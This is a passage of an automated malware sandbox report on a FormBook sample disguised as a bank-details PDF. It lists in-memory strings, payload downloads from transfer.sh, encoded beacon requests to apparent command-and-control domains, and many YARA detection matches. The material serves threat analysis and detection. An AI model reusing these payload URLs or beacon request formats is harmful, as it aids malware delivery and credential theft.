20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.266747263.000000001C170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://ocsp.digicert.com0N
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263142353.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.305526552.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.272013466.0000000006840000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://www.avast.com0/
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: http://www.digicert.com/CPS0
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263142353.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: https://transfer.sh/get/AeJsG7/RAM.txt
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: https://transfer.sh/get/y4hP6y/DLLLLLLLL.txt
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: https://transfer.sh/get/y4hP6y/DLLLLLLLL.txt;VXCSGDFD.Properties.Resources
          Source: BANK DETAILS-25012022-971332pdf.exe, 00000001.00000002.263280018.000000000309B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/y4hP6y/DLLLLLLLL.txtx
          Source: WWAHost.exe, 00000010.00000002.518731229.0000000003DA2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://wearekamchatka.com//be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL
          Source: BANK DETAILS-25012022-971332pdf.exeString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownDNS traffic detected: queries for: transfer.sh
          Source: global trafficHTTP traffic detected: GET /get/AeJsG7/RAM.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /get/y4hP6y/DLLLLLLLL.txt HTTP/1.1Host: transfer.sh
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=ZACv9Iyh0rPZy/9/g0wPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPV5sctPCm8P82V3qxg==&xN9=9rHpFJex8 HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=MXCJfAinsdUT0nhhknsrtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuF+1kPk8mbaZ3X+7FQ==&xN9=9rHpFJex8 HTTP/1.1Host: www.janhenningsen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=yMGLhnybay5mZd/ZPFkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsijaPEOonxtzUinVLZQ==&xN9=9rHpFJex8 HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=o5nWsVakMWYc7w6fw0YZzD6T98nAnbLK/jyfa2gYanpMFXzyxGBpmDpbEk08JIgv5yuWiK9Rzg==&xN9=9rHpFJex8 HTTP/1.1Host: www.vaughnediting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex8 HTTP/1.1Host: www.kamchatka-agency.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: BANK DETAILS-25012022-971332pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342063215.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.261658233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.266042035.0000000013054000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.261402302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.517033082.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.311832941.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.342122402.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.517249365.0000000002870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.297806322.000000000FB61000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041C09E5_2_0041C09E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041C22E5_2_0041C22E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041BBA95_2_0041BBA9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041CC0C5_2_0041CC0C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_0041BCCB5_2_0041BCCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_00408C805_2_00408C80
